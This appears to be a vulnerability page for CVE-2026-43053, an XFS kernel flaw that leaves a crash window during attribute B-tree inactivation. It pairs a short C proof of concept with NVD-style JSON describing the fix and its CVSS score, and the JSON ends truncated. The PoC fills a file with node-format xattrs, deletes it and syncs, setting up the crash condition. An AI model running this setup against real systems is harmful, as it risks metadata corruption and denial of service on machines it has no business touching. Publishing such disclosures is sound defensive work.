CVE-2026-43053

#include <stdio.h> #include <stdlib.h> #include <sys/xattr.h> #include <unistd.h> /* * PoC for CVE-2026-43053 * This script creates a file with enough extended attributes * to force the XFS B-tree into 'node' format. * Deleting the file triggers the inactivation process. * Exploitation requires a system crash during the inactivation window. */ int main() { const char *filename = "poc_xfs_file.txt"; FILE *fp = fopen(filename, "w"); if (!fp) { perror("Failed to create file"); return 1; } fclose(fp); // Add many attributes to trigger node format (btree split) char name[32]; char value[4] = "val"; for (int i = 0; i < 1000; i++) { snprintf(name, sizeof(name), "user.attr%d", i); if (setxattr(filename, name, value, 3, 0) != 0) { // Might fail due to limits, but enough is usually reached before // perror("setxattr"); } } printf("File with node-format xattrs created. Triggering inactivation...\n"); // Deleting the file triggers xfs_attr_inactive -> xfs_attr3_node_inactive unlink(filename); // Ensure data is written to disk to set up the crash scenario sync(); printf("PoC setup complete. A crash during the window would exploit the vulnerability.\n"); return 0; }

{"cve": {"id": "CVE-2026-43053", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-01T15:16:51.777", "lastModified": "2026-05-07T18:24:03.143", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nxfs: close crash window in attr dabtree inactivation\n\nWhen inactivating an inode with node-format extended attributes,\nxfs_attr3_node_inactive() invalidates all child leaf/node blocks via\nxfs_trans_binval(), but intentionally does not remove the corresponding\nentries from their parent node blocks. The implicit assumption is that\nxfs_attr_inactive() will truncate the entire attr fork to zero extents\nafterwards, so log recovery will never reach the root node and follow\nthose stale pointers.\n\nHowever, if a log shutdown occurs after the leaf/node block cancellations\ncommit but before the attr bmap truncation commits, this assumption\nbreaks. Recovery replays the attr bmap intact (the inode still has\nattr fork extents), but suppresses replay of all cancelled leaf/node\nblocks, maybe leaving them as stale data on disk. On the next mount,\nxlog_recover_process_iunlinks() retries inactivation and attempts to\nread the root node via the attr bmap. If the root node was not replayed,\nreading the unreplayed root block triggers a metadata verification\nfailure immediately; if it was replayed, following its child pointers\nto unreplayed child blocks triggers the same failure:\n\n XFS (pmem0): Metadata corruption detected at\n xfs_da3_node_read_verify+0x53/0x220, xfs_da3_node block 0x78\n XFS (pmem0): Unmount and run xfs_repair\n XFS (pmem0): First 128 bytes of corrupted metadata buffer:\n 00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n 00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n 00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n 00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n 00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n 00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n 00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n 00000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n XFS (pmem0): metadata I/O error in \"xfs_da_read_buf+0x104/0x190\" at daddr 0x78 len 8 error 117\n\nFix this in two places:\n\nIn xfs_attr3_node_inactive(), after calling xfs_trans_binval() on a\nchild block, immediately remove the entry that references it from the\nparent node in the same transaction. This eliminates the window where\nthe parent holds a pointer to a cancelled block. Once all children are\nremoved, the now-empty root node is converted to a leaf block within the\nsame transaction. This node-to-leaf conversion is necessary for crash\nsafety. If the system shutdown after the empty node is written to the\nlog but before the second-phase bmap truncation commits, log recovery\nwill attempt to verify the root block on disk. xfs_da3_node_verify()\ndoes not permit a node block with count == 0; such a block will fail\nverification and trigger a metadata corruption shutdown. on the other\nhand, leaf blocks are allowed to have this transient state.\n\nIn xfs_attr_inactive(), split the attr fork truncation into two explicit\nphases. First, truncate all extents beyond the root block (the child\nextents whose parent references have already been removed above).\nSecond, invalidate the root block and truncate the attr bmap to zero in\na single transaction. The two operations in the second phase must be\natomic: as long as the attr bmap has any non-zero length, recovery can\nfollow it to the root block, so the root block invalidation must commit\ntogether with the bmap-to-zero truncation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-367"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.6.12.1", "versionEndExcluding": "6.19.12", "matchCriteriaId": "8BBAF456-DAEF-40C6-8160-B60292EB73A7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.12:-:*:*:*:*:*:*", "matchCriteriaId": "6F62EECE-8FB1-4D57-85D8-CB9E23CF313C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.12: ... (truncated)